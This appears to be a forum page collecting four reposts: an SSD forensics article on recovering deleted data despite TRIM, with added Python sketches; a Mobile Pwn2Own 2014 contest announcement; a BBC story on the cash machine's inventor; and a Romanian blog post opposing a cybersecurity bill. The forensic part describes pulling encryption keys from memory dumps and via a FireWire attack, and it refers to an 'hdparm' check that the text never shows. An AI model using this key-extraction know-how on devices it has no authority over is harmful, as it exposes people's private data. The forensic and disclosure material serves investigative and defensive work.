There are generally two scenarios: either the SSD only contains existing data (files and folders, traces of deleted data in MFT attributes, unallocated space carrying no information), or the SSD contains the full information (destroyed evidence still available in unallocated disk space). Today, we can predict which scenario is going to happen by investigating the conditions in which the SSD drive has been used.

Scenario 1: Existing Files Only

In this scenario, the SSD may contain some files and folders, but free disk space will be truly empty (as in “filled with zero data”). As a result, carving free disk space will return no information or only traces of information, while carving the entire disk space will only return data contained in existing files. So, is file carving useless on SSD drives? No way! Carving is the only practical way of locating moved or hidden evidence (e.g. renamed history files or documents stored in the Windows\System32 folder and renamed to .SYS or .DLL). Practically speaking, the same acquisition and analysis methods should be applied to an SSD drive as if we were analyzing a traditional magnetic disk. Granted, we’ll recover little or no destroyed evidence, but any evidence contained in existing files, including, e.g., deleted records from SQLite databases (used, for example, in Skype histories), can still be recovered (http://forensic.belkasoft.com/en/recover-destroyed-sqlite-evidence-skype-and-iphone-logs).

Scenario 2: Full Disk Content

In the second scenario, the SSD disk will still contain the complete set of information – just like traditional magnetic disks. Obviously, all the usual techniques should be applied at the analysis stage, including file carving. Why would an SSD drive NOT destroy evidence as a result of routine garbage collection? The garbage collection algorithm erasing the content of released data blocks does not run if the TRIM command has not been issued, or if the TRIM protocol is not supported by any link of the chain.
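The difference between the two scenarios comes down to whether signature-based carving of unallocated space finds anything. A minimal carver can be sketched as follows; this is an illustration only (real tools such as Belkasoft Evidence Center also validate footers, lengths and internal structure), and the sample image bytes are invented:

```python
# Minimal signature-based carver sketch: scan a raw image for known file headers.
SIGNATURES = {
    b"\xFF\xD8\xFF": "jpeg",        # JPEG SOI marker
    b"\x89PNG\r\n\x1a\n": "png",    # PNG magic
    b"%PDF-": "pdf",                # PDF header
}

def carve_offsets(image: bytes):
    """Return sorted (offset, type) pairs for every signature hit in the image."""
    hits = []
    for magic, ftype in SIGNATURES.items():
        start = 0
        while (pos := image.find(magic, start)) != -1:
            hits.append((pos, ftype))
            start = pos + 1
    return sorted(hits)

# Scenario 1: a trimmed-and-zeroed region yields nothing to carve.
zeroed = b"\x00" * 4096
print(carve_offsets(zeroed))  # []

# Scenario 2: unallocated space still holding deleted data yields headers.
dirty = b"\x00" * 100 + b"%PDF-1.4 ..." + b"\x00" * 100 + b"\xFF\xD8\xFF\xE0"
print(carve_offsets(dirty))  # [(100, 'pdf'), (212, 'jpeg')]
```

The same scan applied to the whole disk (not just unallocated clusters) is what locates renamed or hidden files in Scenario 1.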
Let’s see in which cases this could happen.

More than 1000 items were carved out of the unallocated sectors of an SSD drive, including Internet Explorer history, Skype conversations, SQLite databases, system files and other forensically important types of data.

Operating System Support

TRIM is a property of the operating system as much as it is a property of the SSD device. Older file systems do not support TRIM. Wikipedia (http://en.wikipedia.org/wiki/Trim_(computing)) has a comprehensive table detailing operating system support for the TRIM command.

[TABLE]
[TR]
[TD]Operating System[/TD]
[TD]Supported since[/TD]
[TD]Notes[/TD]
[/TR]
[TR]
[TD]DragonFly BSD[/TD]
[TD]May 2011[/TD]
[TD][/TD]
[/TR]
[TR]
[TD]FreeBSD[/TD]
[TD]8.1 – July 2010[/TD]
[TD]Support was added at the block device layer in 8.1. File system support was added in FreeBSD 8.3 and FreeBSD 9, beginning with UFS. ZFS trimming support was added in FreeBSD 9.2. FreeBSD 10 will support trimming on software RAID configurations.[/TD]
[/TR]
[TR]
[TD]Linux[/TD]
[TD]2.6.28 – 25 December 2008[/TD]
[TD]Initial support for discard operations was added for FTL NAND flash devices in 2.6.28. Support for the ATA Trim command was added in 2.6.33. Not all file systems make use of Trim. Among the file systems that can issue Trim requests automatically are Ext4, Btrfs, FAT, GFS2 and XFS. However, this is disabled by default due to performance concerns, but it can be enabled by setting the “discard” mount option. Ext3, NILFS2 and OCFS2 offer ioctls to perform offline trimming.
The Trim specification calls for supporting a list of trim ranges, but as of kernel 3.0, trim is only invoked with a single range, which is slower.[/TD]
[/TR]
[TR]
[TD]Mac OS X[/TD]
[TD]10.6.8 – 23 June 2011[/TD]
[TD]Although the AHCI block device driver gained the ability to display whether a device supports the Trim operation in 10.6.6 (10J3210), the functionality itself remained inaccessible until 10.6.8, when the Trim operation was exposed via the IOStorageFamily and file system (HFS+) support was added. Some online forums state that Mac OS X only supports Trim for Apple-branded SSDs; third-party utilities are available to enable it for other brands.[/TD]
[/TR]
[TR]
[TD]Microsoft Windows[/TD]
[TD]NT 6.1 (Windows 7 and Windows Server 2008 R2) – October 2009[/TD]
[TD]Windows 7 only supports trim for ordinary (SATA) drives and does not support this command for PCI Express SSDs, which are a different type of device, even if the device itself would accept the command. It is confirmed that with native Microsoft drivers the Trim command works in AHCI and legacy IDE/ATA mode.[/TD]
[/TR]
[TR]
[TD]OpenSolaris[/TD]
[TD]July 2010[/TD]
[TD][/TD]
[/TR]
[TR]
[TD]Android[/TD]
[TD]4.3 – 24 July 2013[/TD]
[TD][/TD]
[/TR]
[/TABLE]

Old Versions of Windows

As shown in the table above, TRIM support was only added in Windows 7. Obviously, TRIM is supported in Windows 8 and 8.1. In Windows Vista and earlier, the TRIM protocol is not supported, and the TRIM command is not issued. As a result, when analyzing an SSD drive obtained from a system running one of the older versions of Windows, it is possible to obtain the full content of the device. Possible exception: TRIM-like performance can be enabled via certain third-party solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox).

Mac OS X

Mac OS X started supporting the TRIM command for Apple-supplied SSD drives with version 10.6.8. Older builds of Mac OS X do not support TRIM.
Notably, user-installed SSD drives not supplied by Apple itself are excluded from TRIM support.

Old or Basic SSD Hardware

Not all SSD drives support TRIM and/or background garbage collection. Older SSD drives as well as SSD-like flash media used in basic tablets and sub-notes (such as certain models of ASUS Eee) do not support the TRIM command. For example, Intel started manufacturing TRIM-enabled SSD drives at a lithography of 34nm (G2); their 50nm SSDs do not have TRIM support. In reality, few SSD drives without TRIM survived that long. Many entry-level sub-notebooks use flash-based storage often mislabeled as “SSD” that neither features garbage collection nor supports the TRIM protocol.

(Windows) File Systems Other than NTFS

TRIM is a feature of the file system as much as a property of the SSD drive. At this time, Windows only supports TRIM on NTFS-formatted partitions. Volumes formatted with FAT, FAT32 and exFAT are excluded. Notably, some (older) SSD drives used trickery to work around the lack of TRIM support by trying to interpret the file system, attempting to erase dirty blocks not referenced from the file system. This approach, when enabled, only works for the FAT file system, since it’s a published spec. (http://www.snia.org/sites/default/files2/sdc_archives/2009_presentations/thursday/NealChristiansen_ATA_TrimDeleteNotification_Windows7.pdf)

External drives, USB enclosures and NAS

The TRIM command is fully supported over the SATA interface, including the eSATA extension, as well as over SCSI via the UNMAP command. If an SSD drive is used in a USB enclosure or installed in most models of NAS devices, the TRIM command will not be communicated over the unsupported interface. There is a notable exception.
Some NAS manufacturers are starting to recognize the demand for units with the ultra-high performance, low power consumption and noise-free operation provided by SSD drives, and are slowly adopting TRIM in some of their models. At the time of this writing, of all manufacturers only Synology appears to support TRIM, in a few select models of NAS devices and SSD drives. Here is a quote from the Synology Web site (https://www.synology.com/en-uk/support/faq/591):

SSD TRIM improves the read and write performance of volumes created on SSDs, increasing efficiency as well as extending the lifetime of your SSDs. See the list below for verified SSDs with TRIM support.

· You may customize a schedule to choose when the system will perform TRIM.
· SSD TRIM is not available when an SHA cluster exists.
· TRIM cannot be enabled on iSCSI LUN.
· The TRIM feature under RAID 5 and 6 configurations can only be enabled on SSDs with DZAT (Deterministic Read Zero after TRIM) support. Please contact your SSD manufacturers for details on DZAT support.

PCI Express SSDs

Interestingly, the TRIM command is not natively supported by any version of Windows for the many high-performance SSD drives occupying the PCI Express slot. Do not confuse PCI Express SSDs with SATA drives carrying M.2 or mSATA interfaces. Possible exception: TRIM-like performance can be enabled via certain third-party solutions (e.g., Intel SSD Optimizer, a part of Intel SSD Toolbox).

RAID

The TRIM command is not yet supported over RAID configurations (with a few rare exceptions), so SSD drives working as part of a RAID array can be analyzed much like traditional drives. A notable exception to this rule would be a modern RAID 0 setup using a compatible chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied by the correct drivers (the latest RST driver from Intel allegedly works) and a recent version of BIOS. In these configurations, TRIM can be enabled.
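As the sections above show, TRIM only destroys evidence when every link of the chain (OS, file system, interface, RAID layer, drive) supports it. On a live Windows system, the real command `fsutil behavior query DisableDeleteNotify` reports whether the OS issues TRIM at all. Below is a small sketch that parses its output; the exact output string is an assumption based on the documented `DisableDeleteNotify = 0/1` format:

```python
import re

def windows_trim_enabled(fsutil_output: str) -> bool:
    """Parse the output of `fsutil behavior query DisableDeleteNotify`.

    DisableDeleteNotify = 0 means Windows issues TRIM (delete notifications);
    DisableDeleteNotify = 1 means TRIM is suppressed.
    """
    m = re.search(r"DisableDeleteNotify\s*=\s*(\d+)", fsutil_output)
    if not m:
        raise ValueError("unexpected fsutil output")
    return m.group(1) == "0"

# On a live Windows system one would first run (admin rights required):
#   fsutil behavior query DisableDeleteNotify
# and feed the captured text to the parser:
print(windows_trim_enabled("DisableDeleteNotify = 0"))  # True  (TRIM issued)
print(windows_trim_enabled("DisableDeleteNotify = 1"))  # False (TRIM suppressed)
```

On Linux, the `hdparm -I` check quoted earlier answers the drive-side half of the same question.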
Corrupted Data

Surprisingly, SSD drives with corrupted system areas (damaged partition tables, skewed file systems, etc.) are easier to recover than healthy ones. The TRIM command is not issued over corrupted areas because files are not properly deleted; they simply become invisible or inaccessible to the operating system. Many commercially available data recovery tools (e.g., Intel® Solid-State Drive Toolbox with Intel® SSD Optimizer, OCZ SSD Toolbox) can reliably extract information from logically corrupted SSD drives.

Bugs in SSD Firmware

Firmware used in SSD drives may contain bugs, often affecting the TRIM functionality and/or messing up garbage collection. To give an example, the OCZ Agility 3 120 GB shipped with buggy firmware v. 2.09, in which TRIM did not work. Firmware v. 2.15 fixed TRIM behavior, while v. 2.22 introduced issues with data loss on wake-up after sleep; firmware v. 2.25 then fixed that but disrupted TRIM operation again (information taken from http://www.overclock.net/t/1330730/ocz-firmware-2-25-trim-doesnt-work-bug-regression-bad-ocz-experience). A particular SSD drive may or may not be recoverable depending on which bugs were present in its firmware.

Bugs in SSD Over-Provisioning

SSD over-provisioning is one of the many wear-leveling mechanisms intended to increase SSD life span. Some areas on the disk are reserved at the controller level, meaning that a 120 GB SSD drive carries more than 120 GB of physical memory. These extra data blocks are called the over-provisioning area (OP area), and can be used by SSD controllers when a fresh block is required for a write operation. A dirty block will then enter the OP pool, and will be erased by the garbage collection mechanism during the drive’s idle time. Speaking of SSD over-provisioning, firmware bugs can affect TRIM behavior in other ways, for example by revealing trimmed data after a reboot/power off.
Solid-state drives constantly remap blocks after TRIM, allocating addresses out of the OP pool. As a result, the SSD reports a trimmed data block as writeable (already erased) immediately after TRIM. Obviously, the drive did not have time to actually clean the old data from that block. Instead, it simply maps a physical block from the OP pool to the address referred to by the trimmed logical block. What happens to the data stored in the old block? For a while, it contains the original data (in many cases compressed data, depending on the SSD controller). However, as that data block is mapped out of the addressable logical space, the original data is no longer accessible or addressable. Sounds complex? You bet. That’s why even seasoned SSD manufacturers may not get it right on the first try. Issues like this can cause problems when, after deleting data and rebooting the PC, some users would see the old data back as if it was never deleted. Apparently, because of the mapping issue the new pointers would not work as they should, due to a bug in the drive’s firmware. OCZ released a firmware fix to correct this behavior, but similar (or other) bugs may still affect other drives.

SSD Shadiness: Manufacturers Bait-and-Switch

When choosing an SSD drive, customers tend to read online reviews. Normally, when a new drive gets released, it is reviewed by various sources soon after it becomes available. The reviews get published, and customers often base their choice on them. But what if a manufacturer silently changes the drive’s specs without changing the model number? In this case, an SSD drive that used to have great reviews suddenly becomes much less attractive. This is exactly what happened with some manufacturers.
According to ExtremeTech (http://www.extremetech.com/extreme/184253-ssd-shadiness-kingston-and-pny-caught-bait-and-switching-cheaper-components-after-good-reviews), two well-known SSD manufacturers, Kingston and PNY, were caught bait-and-switching cheaper components after getting good reviews. In this case, the two manufacturers were launching their SSDs with one hardware specification, and then quietly changed the hardware configuration after the reviews had gone out. So what’s in it for us? Well, the forensic-friendly SandForce controller was found in the second revision of PNY Optima drives. Instead of the original Silicon Motion controller, the new batch of PNY Optima drives had a different, SandForce-based controller known for its less-than-perfect implementation of garbage collection, leaving data on the disk for a long time after it’s been deleted.

Small Files: Slack Space

Remnants of deleted evidence can be acquired from so-called slack space as well as from MFT attributes. In the world of SSDs, the term “slack space” receives a new meaning. Rather than being a matter of file and cluster size alignment, “slack space” in SSD drives deals with the different sizes of the minimum writeable and minimum erasable blocks on a physical level. Micron, the manufacturer of NAND chips used in many SSD drives, published a comprehensive article on SSD structure: https://www.micron.com/~/media/Documents/Products/Technical%20Marketing%20Brief/ssd_effect_data_placement_writes_tech_brief.pdf In SSD terms, a page is the smallest unit of storage that can be written to. The typical page size of today’s SSDs is 4 KB or 8 KB. A block, on the other hand, is the smallest unit of storage that can be erased. Depending on the design of a particular SSD drive, a single block may contain 128 to 256 pages.
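The page/block geometry above can be turned into simple arithmetic showing why small deleted files may dodge garbage collection. The specific numbers (4 KB pages, 128 pages per block) are one hypothetical drive configuration within the ranges quoted above, not any particular model:

```python
# Illustrative SSD geometry arithmetic (hypothetical drive parameters).
PAGE_SIZE = 4 * 1024          # smallest writable unit: 4 KB
PAGES_PER_BLOCK = 128         # 128..256 pages per block, depending on the drive
BLOCK_SIZE = PAGE_SIZE * PAGES_PER_BLOCK

print(BLOCK_SIZE // 1024)     # 512 -> the smallest erasable unit is 512 KB

def block_erasable(deleted_pages: set, total_pages: int = PAGES_PER_BLOCK) -> bool:
    """A block can only be erased once no page in it is still allocated.

    If even one page holds live data, the whole block survives garbage
    collection -- and so may the deleted pages sharing the block with it.
    """
    return len(deleted_pages) == total_pages

# A 4 KB deleted file occupies one page of a 128-page block; the other
# 127 pages still hold live data, so the block is not erased:
print(block_erasable(deleted_pages={0}))              # False
# Only when every page in the block is released can it be erased:
print(block_erasable(deleted_pages=set(range(128))))  # True
```

With 8 KB pages and 256 pages per block, the same arithmetic gives the 2 MB figure mentioned below.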
As a result, if a file is deleted and its size is less than the size of a single SSD data block, OR if a particular SSD data block contains pages that still remain allocated, that particular block is NOT erased by the garbage collection algorithm. In practical terms, this means that files or file fragments (chunks) smaller than 512 KB or 2 MB, depending on the SSD model, may not be affected by the TRIM command and may still be forensically recoverable. However, the implementation of the Deterministic Read After Trim (DRAT) protocol by many recent SSD drives makes trimmed pages inaccessible via standard SATA commands. If a particular SSD drive implements DRAT or DZAT (Deterministic Read Zero After Trim), the actual data may physically reside on the drive for a long time, yet it will be unavailable to forensic specialists via standard acquisition techniques. Sending the SSD drive to the manufacturer might be the only way of obtaining this information on a physical level.

Small Files: MFT Attributes

Most hard drives used in Windows systems use NTFS as their file system. NTFS stores information about files and directories in the Master File Table (MFT). The MFT contains information about all files and directories listed in the file system; in other words, each file or directory has at least one record in the MFT. In terms of computer forensics, one particular feature of the MFT is of great interest. Unique to NTFS is the ability to store small files directly in the file system. The entire content of a small file can be stored as an attribute inside an MFT record, greatly improving reading performance and decreasing wasted disk space (the “slack” space referenced in the previous chapter). As a result, small files being deleted are not going anywhere: their entire content continues residing in the file system. The MFT records are not emptied, and are not affected by the TRIM command.
This in turn allows investigators to recover such resident files by carving the file system. How small does a file have to be to fit inside an MFT record? Very small. The maximum size of a resident file cannot exceed 982 bytes. Obviously, this severely limits the value of resident files for the purpose of digital forensics.

Encrypted Volumes

Somewhat counter-intuitively, information deleted from certain types of encrypted volumes (some configurations of BitLocker, TrueCrypt, PGP and other containers) may be easier to recover, as it may not be affected by the TRIM command. Files deleted from such encrypted volumes stored on an SSD drive can be recovered (unless they were specifically wiped by the user) if the investigator knows either the original password or the binary decryption keys for the volume. Encrypted containers are a big topic, so we’ll cover them in a dedicated chapter. TRIM on encrypted volumes is a huge topic well worth a dedicated article or even a series of articles. With the large number of crypto containers floating around and all the different security considerations and available configuration options, determining whether TRIM was enabled on a particular encrypted volume is less than straightforward. Let’s try assembling a brief summary of some of the most popular encryption options.

Apple FileVault 2

Introduced with Apple OS X “Lion”, FileVault 2 enables whole-disk encryption. More precisely, FileVault 2 enables whole-volume encryption on HFS+ volumes only (Encrypted HFS). Apple chose to enable TRIM with FileVault 2 volumes on SSD drives. This has the expected security implication of free sectors/blocks being revealed.

Microsoft BitLocker

Microsoft has its own built-in version of volume-level encryption called BitLocker. Microsoft made the same choice as Apple, enabling TRIM on BitLocker volumes located on SSD drives. As usual for Microsoft Windows, the TRIM command is only available on NTFS volumes.
TrueCrypt

TrueCrypt supports TRIM pass-through on encrypted volumes located on SSD drives. The developers issued several security warnings in relation to wear-leveling security issues and the TRIM command revealing information about which blocks are in use and which are not (http://www.truecrypt.org/docs/trim-operation and http://www.truecrypt.org/docs/wear-leveling).

PGP Whole Disk Encryption

By default, PGP whole-disk encryption does not enable TRIM on encrypted volumes. However, considering the wear-leveling issues of SSD drives, Symantec introduced an option to enable TRIM on SSD volumes via a command line option: --fast (http://www.symantec.com/connect/forums/pgp-and-ssd-wear-leveling). If an encrypted volume of a fixed size is created, the default behavior is also to encrypt the entire content of the file representing the encrypted volume, which disables the effect of the TRIM command for the contents of the encrypted volume. More research is required to investigate these options. At this time one thing is clear: in many configurations, including default ones, files deleted from encrypted volumes will not be affected by the TRIM command. Which brings us to the question of the correct acquisition of PCs with encrypted volumes.

Forensic Acquisition: The Right Way to Do It

The right way to acquire a PC with a crypto container can be described with the following sentence: “If it’s running, don’t turn it off. If it’s off, don’t turn it on.” Indeed, the original decryption keys are cached in the computer’s memory, and can be extracted from a live RAM dump obtained from a running computer, e.g. by performing a FireWire attack. These keys can also be contained in page files and hibernation files. Tools such as Passware can extract decryption keys from memory dumps and page/hibernation files, decrypting the content of encrypted volumes.

Reality Steps In: Why Real SSDs are Often Recoverable

In reality, things may look different from what was just described above in such great technical detail.
In our lab, we’ve seen hundreds of SSD drives acquired from a variety of computers. Surprisingly, Belkasoft Evidence Center was able to successfully carve deleted data from the majority of SSD drives taken from inexpensive laptops and sub-notebooks such as the ASUS Eee or ASUS Zenbook. Why is it so? There are several reasons, mainly “cost savings” and “miniaturization”, but sometimes it’s simply over-engineering.

Inexpensive laptops often use flash-based storage, calling it an SSD as a marketing ploy. In fact, in most cases it’s just slow, inexpensive and fairly small flash-based storage having nothing to do with real SSD drives.

Ultrabooks and sub-notes have no space to fit a full-size SSD drive. They used to use SSD drives in the PCIe form factor (as opposed to M.2 or mSATA), which did not support the SATA protocol. Even if these drives are compatible with the TRIM protocol, Windows does not support TRIM on non-ATA devices. As a result, TRIM is not enabled on these drives.

SSD drives are extremely complex devices requiring extremely complex firmware to operate. Many SSD drives were released with buggy firmware effectively disabling the effects of TRIM and garbage collection. If the user has not upgraded their SSD firmware to a working version, the original data may reside on the SSD drive for a long time.

The fairly small (and inexpensive) SSD drives used in many entry-level notebooks lack support for DRAT/DZAT. As a result, deleted (and trimmed) data remain accessible for a long time, and can be successfully carved from a promptly captured disk image.

On the other end of the spectrum are the very high-end, over-engineered devices. For example, Acer advertises its Aspire S7-392 as having a RAID 0 SSD. According to Acer marketing, “RAID 0 solid state drives are up to 2X faster than conventional SSDs. Access your files and transfer photos and movies quicker than ever!” (http://www.acer.com/aspires7/en_US/). This looks like over-engineering.
As TRIM is not enabled on RAID SSDs in any version of Windows, this ultra-fast non-conventional storage system may slow down drastically over time (which is exactly why TRIM was invented in the first place). For us, this means that any data deleted from these storage systems could remain there for at least as long as it would have remained on a traditional magnetic disk. Of course, the use of the right chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied by the correct drivers (the latest RST driver from Intel allegedly works) can in turn re-enable TRIM. However, we have yet to see how this works in reality. (http://www.anandtech.com/show/6477/trim-raid0-ssd-arrays-work-with-intel-6series-motherboards-too)

Conclusion

SSD forensics remains different. SSDs self-destroy court evidence, making it difficult to extract deleted files; recovering destroyed information (e.g., from formatted disks) is close to impossible. Numerous exceptions still exist, allowing forensic specialists to access destroyed evidence on SSD drives used in certain configurations. There has been little progress in SSD development since the publication of our last article on SSD forensics in 2012. The factor defining the playing field remains delivering bigger size for less money. That aside, compressing SSD controllers appear to be becoming the norm, making off-chip acquisition impractical and killing all sorts of DIY SSD acquisition hardware. More SSD drives appear to follow the Deterministic Read After Trim (DRAT) approach defined in the SATA standard a long time ago. This in turn means that a quick format is likely to instantly render deleted evidence inaccessible to standard read operations, even if the drive is acquired with forensic write-blocking imaging hardware immediately after. SSD drives are getting more complex, adding over-provisioning support and using compression for better performance and wear leveling.
However, because of the increased complexity, even seasoned manufacturers have released SSD drives with buggy firmware, causing improper operation of the TRIM and garbage collection functionality. Considering just how complex today’s SSD drives have become, it’s surprising these things do work, even occasionally. The playing field is constantly changing, but what we know now about SSD forensics gives hope.

About the authors

Yuri Gubanov is a renowned computer forensics expert. He is a frequent speaker at industry-known conferences such as HTCIA, TechnoSecurity, CEIC and others. Yuri is the Founder and CEO of Belkasoft. He is also a senior lecturer at St. Petersburg State University. You can add Yuri Gubanov to your LinkedIn network at Yuri Gubanov | LinkedIn

Oleg Afonin is an expert and consultant in computer forensics. You can contact the authors via research@belkasoft.com

About Belkasoft Research

Belkasoft Research is based in St. Petersburg State University. The company performs non-commercial research and scientific activities.

Sursa: Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions | Forensic Focus - Articles
-
Admin | September 4, 2014 HP Security Research’s Zero Day Initiative (ZDI) invites you to join us for the third annual Mobile Pwn2Own competition, to be held this year on November 12-13 at PacSec Applied Security Conference in Tokyo, Japan. We’re looking forward to rewarding the world’s top researchers for demonstrating and disclosing their stealthy attacks on mobile devices, and we’re delighted that our friends at Google’s Android Security Team and BlackBerry are joining us again as sponsors. This year, we’re upping the prize pool to $425,000, rearranging the prize package, and introducing new devices in order to attract the best and brightest researchers and enhance security for the most popular mobile platforms.

In their sights – the mobile attack surface

In case you’re not familiar, Mobile Pwn2Own is ZDI’s annual contest that rewards security researchers for highlighting security vulnerabilities on mobile platforms. (You may have heard of its sister contest for other platforms, Pwn2Own, which was held in March this year at CanSecWest.) With the near-ubiquity of mobile devices, vulnerabilities on these platforms are becoming increasingly coveted and are actively and vigorously hunted by criminals for exploitation. This contest helps to harden these devices by finding vulnerabilities first and sharing that research with mobile device and platform vendors.

This year’s bounty

The prize pool is rising again, with HP and its sponsors offering over $425,000 (USD) in cash and prizes to researchers who successfully compromise selected mobile targets from particular categories, which is $125,000 more than last year’s contest. Contestants are judged on their ability to uncover new vulnerabilities and to develop cutting-edge exploit techniques that can be used to compromise some of the world’s most popular mobile devices.
· Mobile Web Browser ($50,000)
· Mobile Application/Operating System ($50,000): reachable by a remote attacker (including through the browser)
· Short Distance ($75,000), either: Bluetooth, Wi-Fi, or Near Field Communication (NFC)
· Messaging Services ($100,000), either: Short Message Service (SMS), Multimedia Messaging Service (MMS), or Commercial Mobile Alert System (CMAS)
· Baseband ($150,000): limited to Apple iPhone, Google Nexus, BlackBerry Z30 only

Contestants can select the target they want to compromise during pre-registration. The details, including exact OS version, applications, firmware and model numbers will be coordinated after pre-registration. The following targets are available for selection:

· Amazon Fire Phone
· Apple iPhone 5s
· Apple iPad Mini with Retina Display
· BlackBerry Z30
· Google Nexus 5
· Google Nexus 7
· Nokia Lumia 1520
· Samsung Galaxy S5

How do I enter?

The contest is open to all registrants in the PacSec 2014 conference (as long as you meet our rather inclusive eligibility requirements). Start by reviewing the contest rules, here. Next, if you don’t already have a free ZDI researcher account, you need to sign-up here. When you’re all signed up as a ZDI researcher, it’s simply a matter of contacting us to register for the contest.

More importantly, how do I win?

Be the first to compromise a selected target in one of the categories using a previously unknown vulnerability (one that has not been disclosed to the affected vendor). You’ve got 30 minutes to complete your attempt. When you’ve successfully demonstrated your exploit and ‘pwned’ the targeted device, you need to provide ZDI with a fully functioning exploit and a whitepaper detailing all of the vulnerabilities and techniques utilized in your attack. A successful attack against these devices must require no user interaction beyond the action required to browse to the malicious content. As always, the initial vulnerability used in the attack must be in the registered category.
The contestant must demonstrate remote code execution by bypassing sandboxes (if applicable) and exfiltrating sensitive information. To avoid interfering with licensed carrier networks, all RF attacks must be completed within the provided RF isolation enclosure. The vulnerabilities utilized in the attack must be unpublished zero-days. As always, ZDI reserves the right to determine what constitutes a successful attack.

The vulnerabilities and exploit techniques discovered by the winning researchers will be disclosed to the affected vendors. If the affected vendor is at the conference, we can even arrange to hand over the vulnerability details onsite for the fastest possible remediation. If you missed it above, the full contest rules are here.

Want to know more? We’ll be tweeting regular updates and news on Mobile Pwn2Own up to and during the contest. You can follow us at @thezdi on Twitter or search for the hashtag #pwn2own. Visit pwn2own.com for updates throughout the contest and to check out content from past contests, including photos, videos and more.

For press inquiries, please contact Heather Goudey heather.goudey@hp.com

Sursa: Mobile Pwn2Own Tokyo 2014 - PWN2OWN
-
The man who invented the cash machine

By Brian Milligan
Business reporter, BBC News

"They're clever scoundrels," fumes John Shepherd-Barron at his remote farmhouse in northern Scotland. He is referring to the seals which are raiding his salmon farm and stealing fish.

[Image caption: John Shepherd-Barron's cash machine first appeared in 1967]

"I invented a device to scare them off by playing the sound of killer whales, but it's ended up only attracting them more." But failure with this device is in contrast to the success of his first and greatest invention: the cash machine.

The world's first ATM was installed in a branch of Barclays in Enfield, north London, 40 years ago this week. Reg Varney, from the television series On the Buses, was the first to withdraw cash.

Inspiration had struck Mr Shepherd-Barron, now 82, while he was in the bath. "It struck me there must be a way I could get my own money, anywhere in the world or the UK. I hit upon the idea of a chocolate bar dispenser, but replacing chocolate with cash."

Barclays was convinced immediately. Over a pink gin, the then chief executive signed a hurried contract with Mr Shepherd-Barron, who at the time worked for the printing firm De La Rue.

Teething troubles

Plastic cards had not been invented, so Mr Shepherd-Barron's machine used cheques that were impregnated with carbon 14, a mildly radioactive substance. The machine detected it, then matched the cheque against a PIN.

[Image caption: Reg Varney was the first to use an ATM]

However, Mr Shepherd-Barron denies there were any health concerns: "I later worked out you would have to eat 136,000 such cheques for it to have any effect on you."

The machine paid out a maximum of £10 a time. "But that was regarded then as quite enough for a wild weekend," he says.
To start with, not everything went smoothly. The first machines were vandalised, and one that was installed in Zurich in Switzerland began to malfunction mysteriously. It was later discovered that the wires from two intersecting tramlines nearby were sparking and interfering with the mechanism.

One by-product of inventing the first cash machine was the concept of the PIN. Mr Shepherd-Barron came up with the idea when he realised that he could remember his six-figure army number. But he decided to check that with his wife, Caroline. "Over the kitchen table, she said she could only remember four figures, so because of her, four figures became the world standard," he laughs.

End of cash?

Customers using the cash machine at Barclays in Enfield High Street are mostly unaware of its historical significance. A small plaque was placed there on the 25th anniversary, but few people notice it. Given that there are now more than 1.6 million cash machines worldwide, it is a classic case of British understatement.

[Image caption: The plaque at the site of the first ATM goes unnoticed by many]

Mr Shepherd-Barron says he and his wife realised the importance of his invention only when they visited Chiang Mai in northern Thailand. They watched a farmer arriving on a bullock cart, who removed his wide-brimmed hat to use the cash machine. "It was the first evidence to me that we'd changed the world," he says.

But even though he invented the machine, Mr Shepherd-Barron believes its use in future will be very different. He predicts that our society will no longer be using cash within a few years. "Money costs money to transport. I am therefore predicting the demise of cash within three to five years." He believes fervently that we will soon be swiping our mobile phones at till points, even for small transactions.
At 82, Mr Shepherd-Barron is very much alive to new ideas and inventions - even though his device that plays killer whale noises still needs a little bit of tinkering. Sursa: BBC NEWS | Business | The man who invented the cash machine
-
The Cybersecurity Law Is Back on Fast Forward
23/09/14 14:27:00, by bogdan, 809 words

Did you really think that, after the ruling on pre-pay, our honorable elected officials and the institutions pushing cyber-securitism understood that bills should be seriously debated, especially those that infringe fundamental freedoms? The proposed law on Romania's cybersecurity was never actually debated in the Chamber of Deputies: it went through by tacit adoption on 17 September. As soon as it was sent to the Senate, the Defense Committee (the lead committee) was given a deadline of 2 (two) days, that is, tomorrow, to issue its report (even though the bill is NOT officially under the urgent procedure). Naturally, the human rights committee was not included, not even for an advisory opinion.

As I have already told you, this bill is far worse than the pre-pay one, which was small change by comparison. Let me remind you of the most interesting proposals:

All companies (SRI claims "users" does not include natural persons; I say it does, but let's not get lost in details) must "allow access to data" to these authorities (SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO and ANCOM). Access is granted upon a simple "motivated request". Pay close attention: this is not about handing over the computer data you hold that might help some investigation, it is about "access to data", in case I was too subtle about the difference.

Every company that owns a laptop, smartphone or any other device must adopt cybersecurity policies, and must identify and implement the appropriate technical and organizational measures to manage security risks efficiently. That means at least 1,500 euros per company invested in security. (You will see what lovely things you have to write in those cybersecurity policies...)

While the EU asks that the institutions in charge of cybersecurity be "civilian bodies, operating fully under democratic control, which should not carry out activities in the field of intelligence", we hand the job to the SRI as the most democratic, civilian and citizen-friendly of institutions. Technical competence it may have, but it is not under democratic control. Nor is it familiar with terms such as public debate, access to public information or decisional transparency.

But I tell you: don't get too worked up! The Senate has no time to debate anyway, and the "18 victims per second of the Internet" (my note: that comes to 1.5 million victims per day) need the SRI to protect them. Even if they don't want it. Likewise, the observations and amendments that were submitted are not even taken into consideration, because it is hard to judge with your own mind. If the SRI tells us something, then surely it is so. And human rights arguments or Constitutional Court (CCR) decisions are not enough for anyone; Romania is not a democracy anyway. The CCR has ruled that access to traffic data must be subject to a judge's review, but it will surely decide otherwise if the data accessed can also include content data (that is, more than traffic data):

"Requests for access to the retained data for use for the purpose provided by law, made by state bodies with responsibilities in the field of national security, are not subject to the authorization or approval of a court, thus lacking the guarantee of effective protection of the stored data against the risks of abuse and against any illicit access to and use of these data. This circumstance is such as to constitute an interference with the fundamental rights to intimate, family and private life and to the secrecy of correspondence and, therefore, contravenes the constitutional provisions that enshrine and protect these rights."

I have said enough. For a fuller picture, read Dan Tapalaga's article as well: Tara Democratiei cu Epoleti (The Country of Democracy with Epaulettes).

And one of the authors at Contributors sums up the situation drily, better than I could have described it:

